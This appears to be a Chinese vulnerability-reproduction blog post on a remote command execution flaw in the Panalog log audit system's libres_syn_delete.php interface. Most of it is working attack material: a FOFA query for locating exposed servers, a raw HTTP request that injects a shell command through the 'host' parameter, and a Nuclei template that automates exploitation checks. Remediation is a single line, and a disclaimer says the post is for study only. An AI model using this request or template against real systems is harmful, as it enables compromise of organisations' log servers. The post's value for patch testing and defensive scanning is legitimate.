• Panalog 日志审计系统RCE漏洞


    免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

    Ⅰ、漏洞描述

    Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务

    Panalog 日志审计系统 libres_syn_delete.php接口处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意代码,最终导致服务器失陷。

    影响范围

    version <= MARS r10p1Free

    Ⅱ、fofa语句

    app="Panabit-Panalog"

    Ⅲ、漏洞复现

    POC

    1. POST /content-apply/libres_syn_delete.php HTTP/1.1
    2. Host: 1270.0.1
    3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    4. Content-Type: application/x-www-form-urlencoded
    5. Accept-Encoding: gzip
    6. Connection: close
    7. token=1&id=2&host=| echo "Hello World!" >ceshi.txt

    1、构建poc

    2、访问

    https://127.0.0.1/content-apply/ceshi.txt

     

    Ⅳ、Nuclei-POC

    1. id: Panalog-RCE
    2. info:
    3. name: Panalog 日志审计系统 libres_syn_delete.php接口处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意代码,最终导致服务器失陷。
    4. author: WLF
    5. severity: high
    6. metadata:
    7. fofa-query: app="Panabit-Panalog"
    8. variables:
    9. filename: "{{to_lower(rand_base(10))}}"
    10. boundary: "{{to_lower(rand_base(20))}}"
    11. http:
    12. - raw:
    13. - |
    14. POST /content-apply/libres_syn_delete.php HTTP/1.1
    15. Host: {{Hostname}}
    16. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    17. Content-Type: application/x-www-form-urlencoded
    18. Accept-Encoding: gzip
    19. Connection: close
    20. token=1&id=2&host=| echo "Hello World!" >{{filename}}.txt
    21. - |
    22. GET /content-apply/{{filename}}.txt HTTP/1.1
    23. Host: {{Hostname}}
    24. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    25. matchers:
    26. - type: dsl
    27. dsl:
    28. - status_code==200 && contains_all(body,"Hello World!")

    Ⅴ、修复建议

    升级至安全版本

  • 相关阅读:
    62. 如何通过增强(Enhancement) 的方式给 SAP ABAP 标准程序增添新功能
    微信公众号之获取ticket
    炒冷饭、语雀崩、领会员-我最主观的一段文字
    晶圆形成步骤
    springboot+jsp 农产品电子商城网站maven idea
    一场深刻的开源聚会:KCC@北京 9.2 活动回顾
    刘二大人 PyTorch深度学习实践 笔记 P6 逻辑斯蒂回归
    Linux安全基线-audit审计规则配置7小项(CentOS8)
    NDK (ndk)报错 Unity requires NDK r19 (64-bit)(19.0.05232133)
    IntelliJ IDEA 记学习笔 Maven自动导包 Auto Import
  • 原文地址:https://blog.csdn.net/weixin_52204925/article/details/136157332